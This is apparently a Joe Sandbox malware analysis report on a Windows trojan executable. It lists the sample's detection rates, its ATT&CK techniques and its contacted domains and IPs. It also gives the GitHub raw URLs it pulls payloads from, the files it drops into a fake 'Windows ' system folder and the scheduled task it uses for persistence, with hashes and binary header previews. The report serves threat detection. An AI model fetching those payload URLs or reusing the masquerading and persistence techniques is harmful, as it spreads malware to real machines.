| Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 111 Windows Service | 1 Access Token Manipulation | 2 Obfuscated Files or Information | Security Account Manager | 22 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 12 Command and Scripting Interpreter | 1 Scheduled Task/Job | 111 Windows Service | 1 DLL Side-Loading | NTDS | 221 Security Software Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | 1 Scheduled Task/Job | Network Logon Script | 11 Process Injection | 11 File Deletion | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 4 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | 1 Service Execution | RC Scripts | 1 Scheduled Task/Job | 12 Masquerading | Cached Domain Credentials | 121 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Valid Accounts | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 121 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 11 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
[Figure: Behavior Graph. ID: 1578892, Sample: 58VSNPxrI4.exe, Startdate: 20/12/2024, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 58VSNPxrI4.exe | 46% | Virustotal | |
| 58VSNPxrI4.exe | 39% | ReversingLabs | Win64.Trojan.Generic |
| 58VSNPxrI4.exe | 100% | Joe Sandbox ML | |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Windows\System32\x939048.dat | 100% | Joe Sandbox ML | |
| C:\Windows \System32\printui.dll | 32% | ReversingLabs | Win64.Trojan.Lazy |
| C:\Windows \System32\printui.exe | 0% | ReversingLabs | |
| C:\Windows\System32\console_zero.exe | 42% | ReversingLabs | Win64.Trojan.Lazy |
| C:\Windows\System32\libcrypto-3-x64.dll | 0% | ReversingLabs | |
| C:\Windows\System32\libcurl.dll | 0% | ReversingLabs | |
| C:\Windows\System32\libiconv-2.dll | 0% | ReversingLabs | |
| C:\Windows\System32\libintl-9.dll | 0% | ReversingLabs | |
| C:\Windows\System32\libpq.dll | 0% | ReversingLabs | |
| C:\Windows\System32\libssl-3-x64.dll | 0% | ReversingLabs | |
| C:\Windows\System32\libwinpthread-1.dll | 0% | ReversingLabs | |
| C:\Windows\System32\ucrtbased.dll | 0% | ReversingLabs | |
| C:\Windows\System32\vcruntime140d.dll | 0% | ReversingLabs | |
| C:\Windows\System32\x939048.dat | 34% | ReversingLabs | Win64.Trojan.Midie |
| C:\Windows\System32\zlib1.dll | 0% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| unvdwl.com | 45.94.31.128 | true | false | | unknown |
| ipinfo.io | 34.117.59.81 | true | false | | high |
| github.com | 20.233.83.145 | true | false | | high |
| raw.githubusercontent.com | 185.199.108.133 | true | false | | high |
| unvmainx.com | 194.26.192.189 | true | false | | unknown |
| dns.google | 8.8.4.4 | true | false | | high |
| rootunvdwl.com | unknown | unknown | false | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://raw.githubusercontent.com/runvd01/dwl/refs/heads/main/un1/uusb.dat | false | | high |
| https://github.com/runvd01/dwl/raw/refs/heads/main/un1/uusb.dat | false | | high |
| https://dns.google/resolve?name=rootunvdwl.com | false | | high |
| https://dns.google/resolve?name=unvdwl.com | false | | high |
| https://ipinfo.io/json | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://ipinfo.io/missingauth | svchost.exe, 0000001A.00000003.2211131614.0000013B844E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.2211131614.0000013B844EB000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://curl.se/docs/http-cookies.html | 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp | false | | high |
| https://dns.google/resolve?name= | 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808210205.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 00000020.00000000.1749217813.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000002A.00000002.1826480187.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000002A.00000000.1764823946.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmp | false | | high |
| https://www.gnu.org/licenses/ | 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2845803486.00000000660F4000.00000008.00000001.01000000.0000000F.sdmp | false | | high |
| https://curl.se/docs/alt-svc.html | 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp | false | | high |
| https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/unv.dat | svchost.exe, 0000001A.00000002.2847004878.0000013B8442B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2847222227.0000013B8448C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.2211131614.0000013B844EB000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://www.openssl.org/ | svchost.exe | false | | high |
| https://curl.se/docs/hsts.html | 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp | false | | high |
| https://curl.se/docs/alt-svc.html# | console_zero.exe | false | | high |
| https://curl.se/docs/copyright.htmlD | 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848835181.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 00000020.00000002.1808475835.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826970264.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp | false | | high |
| https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpusys.dat | svchost.exe, 0000001A.00000003.2211131614.0000013B844E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2847004878.0000013B8442B000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://curl.se/ | svchost.exe, console_zero.exe | false | | high |
| http://www.zlib.net/ | svchost.exe | false | | high |
| http://mingw-w64.sourceforge.net/X | 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp | false | | high |
| https://curl.se/docs/copyright.html | svchost.exe, console_zero.exe | false | | high |
| http://www.zlib.net/D | 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848995492.00007FFBBBDA7000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 00000020.00000002.1808573202.00007FFBBBDA7000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 0000002A.00000002.1827153646.00007FFBBBDA7000.00000002.00000001.01000000.00000010.sdmp | false | | high |
| https://curl.se/docs/hsts.html# | console_zero.exe | false | | high |
| https://www.openssl.org/H | 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2847985695.00007FFBAA11E000.00000002.00000001.01000000.0000000B.sdmp, svchost.exe, 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp | false | | high |
| https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpu.dat | svchost.exe, 0000001A.00000002.2847004878.0000013B8442B000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://raw.githubusercontent.com/runvd01/dwl/refs/heads/main/u | svchost.exe, 0000001A.00000002.2847427687.0000013B84902000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://curl.se/docs/http-cookies.html# | console_zero.exe | false | | high |
| https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/main/unvumainrestorehardx.dat | svchost.exe, 0000001A.00000002.2847310661.0000013B844F0000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/uamd.dat | svchost.exe, 0000001A.00000002.2847028150.0000013B84463000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://www.gnu.org/licenses/ | 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2846258321.00000000682A4000.00000008.00000001.01000000.0000000D.sdmp | false | | high |
| https://curl.se/V | 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848835181.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 00000020.00000002.1808475835.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826970264.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp | false | | high |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 194.26.192.189 | unvmainx.com | Netherlands | 1213 | HEANETIE | false |
| 45.94.31.128 | unvdwl.com | Netherlands | 395800 | GBTCLOUDUS | false |
| 34.117.59.81 | ipinfo.io | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false |
| 8.8.4.4 | dns.google | United States | 15169 | GOOGLEUS | false |
| 185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false |
| 20.233.83.145 | github.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578892
Start date and time: 2024-12-20 16:18:35 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 58
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 58VSNPxrI4.exe (renamed because original name is a hash value)
Original Sample Name: 228c09c31156d45dfe94195bb34d1399.exe
Detection: MAL
Classification: mal100.evad.winEXE@86/46@9/7
EGA Information:
• Successful, ratio: 75%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.43
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 58VSNPxrI4.exe, PID 3576 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:19:51 | API Interceptor | 94x Sleep call for process: powershell.exe modified
10:20:04 | API Interceptor | 1x Sleep call for process: svchost.exe modified
10:20:04 | API Interceptor | 2x Sleep call for process: console_zero.exe modified
16:20:06 | Task Scheduler | Run new task: console_zero path: C:\Windows\System32\console_zero.exe
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            sadfwqefrqw3f.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            74954a0c86284d0d6e1c4efefe92b521676556be12ac3.vbsGet hashmaliciousMint StealerBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.htaGet hashmaliciousMint StealerBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            Hkeyboard.dllGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            67618a47ee8c5.vbsGet hashmaliciousMint StealerBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            webhook.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            loader.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            loader.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
Match: C:\Windows \System32\printui.exe
Associated Sample Name / URL | Detection | Threat Name
pyld611114.exe | malicious | Unknown
dYUteuvmHn.exe | malicious | Unknown
SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe | malicious | Unknown
app64.exe | malicious | Unknown
printui.dll | malicious | Unknown
SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe | malicious | Unknown
F.7z | malicious | Unknown
Ld0f3NDosJ.exe | malicious | Unknown
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):0.34726597513537405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlll:Nll
                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                            Malicious:false
                                                                                            Preview:@...e...........................................................
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Users\user\Desktop\58VSNPxrI4.exe
                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):14162432
                                                                                            Entropy (8bit):6.553472819596516
                                                                                            Encrypted:false
                                                                                            SSDEEP:393216:sPsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCyGTQP76NuudqfZnXSdEVB3:sITk1
                                                                                            MD5:D208410BAE05CFA96A7C83C4CE614DD1
                                                                                            SHA1:2B120F3BD686CB5E7E29D338AFAB78DD9970C70C
                                                                                            SHA-256:DC42B209DA59C321377F42575F4A43E38036A6482556436B2774CFD08E402668
                                                                                            SHA-512:949651249C8A40223DDA7BB3183F620B7949CF0AFD54CC57F34163595AABA03594E5BAC06237D4367D025C3D05C6BC28FC81D4916EBA04D8BCB35BF6031FF235
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 32%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t...[..[..[...ZB..[...Z...[...Z..[.).Z..[.).Z..[.).Z...[...Z..[..[x..[l).Z..[l).[..[l).Z..[Rich..[........PE..d....Neg.........." ...*."................................................................`.................................................D...<....`....... ...,...........p......@}..8............................|..@............@..H............................text.... .......".................. ..`.rdata..^....@.......&..............@..@.data....*..........................@....pdata...,... ......................@..@.fptable.....P......................@....rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\Desktop\58VSNPxrI4.exe
                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):64000
                                                                                            Entropy (8bit):6.336447440888565
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:a4uHmXrH60qKdC5vI1iQfCIWVM9G4qW4ne+S/ly+PKAoXRZX6fbX57UWkCRPPA7f:Uca1KAVIPd4n+lbeRZIbSQPPA7f
                                                                                            MD5:2FC3530F3E05667F8240FC77F7486E7E
                                                                                            SHA1:C52CC219886F29E5076CED98D6483E28FC5CC3E0
                                                                                            SHA-256:AC75AF591C08442EA453EB92F6344E930585D912894E9323DB922BCD9EDF4CD1
                                                                                            SHA-512:EF78DE6A114885B55806323F09D8BC24609966D29A31C2A5AE6AD93D1F0D584D29418BA76CA2F235ED30AD8AE2C91F552C15487C559E0411E978D397C82F7046
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: pyld611114.exe, Detection: malicious
                                                                                            • Filename: dYUteuvmHn.exe, Detection: malicious
                                                                                            • Filename: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, Detection: malicious
                                                                                            • Filename: app64.exe, Detection: malicious
                                                                                            • Filename: printui.dll, Detection: malicious
                                                                                            • Filename: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe, Detection: malicious
                                                                                            • Filename: F.7z, Detection: malicious
                                                                                            • Filename: Ld0f3NDosJ.exe, Detection: malicious
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y..........................................................................Rich....................PE..d...0.sA.........."............................@.............................@.......E....`.......... .......................................'.......P.......@...............0..$...P$..T............................ ..............(!...............................text............................... ..`.rdata....... ......................@..@.data...x....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....0......................@..B........................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):0.34726597513537405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlll:Nll
                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                            Malicious:false
                                                                                            Preview:@...e...........................................................
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):664576
                                                                                            Entropy (8bit):6.597455315682964
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:UKDPkqL1NxW6CDBPXRiD2xTph0lhSMXli6Y2ej+4J7:UQhN+9PXYDQh0lhSMXlpY2ej+
                                                                                            MD5:4ECCB8F5D1EDCF18A11ABED91FF85C46
                                                                                            SHA1:4CF96EF88D3D042D050CC8D963EF2141975A196A
                                                                                            SHA-256:3286EDB355B9AFCB9F08CA87967001A56685D2298014C82A672EF3769E232838
                                                                                            SHA-512:EC8B97CE4712CF94E9C9F5C0454FCBC52559AC4D7D076BF76E2E6A3052FBF18696A5F1BC602A70A06D5101E3F1BCD8B64995A2D71731E7CCB939FE67224924F9
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 42%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~....yV..yV..yV..|Wz.yV..}W..yV..zW..yV.zW..yV.}W..yV.|W..yVT.xW..yV..xW..yV..xVH.yVT.pW..yVT..V..yVT.{W..yVRich..yV........................PE..d....Neg.........."....*..... ......p..........@..........................................`.................................................L...P....`...........L...........p..T...0...8...............................@............0...............................text............................... ..`.rdata..8....0......................@..@.data....3..........................@....pdata...L.......N..................@..@.fptable.....P......................@....rsrc........`......................@..@.reloc..T....p......................@..B........................................................................................................................................................................................
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):4684800
                                                                                            Entropy (8bit):6.761708409908653
                                                                                            Encrypted:false
                                                                                            SSDEEP:98304:E1+WtBcda7nzo7Vd8qQQPQ1CPwDvt3uFGCC:gXtBcda7nzo7Vd8qQQY1CPwDvt3uFGCC
                                                                                            MD5:158F0E7C4529E3867E07545C6D1174A9
                                                                                            SHA1:9FF0CCCB271F0215AD24427B7254832549565154
                                                                                            SHA-256:DCC1FA1A341597DDB1476E3B5B3952456F07870A26FC30B0C6E6312764BAA1FC
                                                                                            SHA-512:51E79D8D0AB183046F87AA659973B45147BB1E1AE8883F688C615CCB18BF9FCCB8779DD872B01748BACD56E141BC096C2BB4CCF32EBD7A49ADC76363355E40FE
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............vI..vI..vI..I..vI;DwH..vI;DsH..vI;DrH..vI;DuH..vI..wI*.vI..wH..vI..vI..vI.GrHl.vI.GvH..vI.G.I..vI.GtH..vIRich..vI........PE..d...d.Lf.........." ...'..4..........4.......................................G...........`...........................................A. ... @D.@....0G.......D.LH...........@G.L.....?.T.............................?.@.............4..............................text...8.4.......4................. ..`.rdata..*.....4.......4.............@..@.data....t...`D..J...JD.............@....pdata..LH....D..J....D.............@..@.rsrc........0G.......F.............@..@.reloc..L....@G.......F.............@..B................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):588800
                                                                                            Entropy (8bit):6.3852695857936554
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:1dkYvMQmNkYBasGpIFetxo8u3zTkIXmaKSTQP76NuudqbaRArq:1zvMQmmYB4KQ7nu3zuSTQP76NuudqbaF
                                                                                            MD5:18CE47F58B4C1A9CFC1EDF7C8BF49B7C
                                                                                            SHA1:E74D08AB06ED8200D7E674D8031D6DF8250DE8CB
                                                                                            SHA-256:36D97F1C254832CEE9698CEA2F1A63EA98D231641FD29715EF581BE103ACE602
                                                                                            SHA-512:19B2D6968095C4E8F08C66AB73E7EC5E0439712BCB2777266602EF2AD123A779395A3D44BC0C7C9945376998FB2165BC60E6BF682863A55A0CFF40C720594BDD
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............|.X.|.X.|.X...X.|.X...Y.|.X..`X.|.X...Y.|.X...Y.|.X...Y.|.X...Y.|.X.|.Xh|.X...Y.|.X...Y.|.X...Y.|.X..bX.|.X.|.X.|.X...Y.|.XRich.|.X........................PE..d...o..f.........." ...).....`......@........................................0............`..........................................Q..$...4[..T................Z........... ..0... ...T...............................@...............`............................text.............................. ..`.rdata..D...........................@..@.data....1...p...*...d..............@....pdata...Z.......\..................@..@.rsrc...............................@..@.reloc..0.... ......................@..B................................................................................................................................................................................................................
                                                                                            Process:C:\Windows \System32\printui.exe
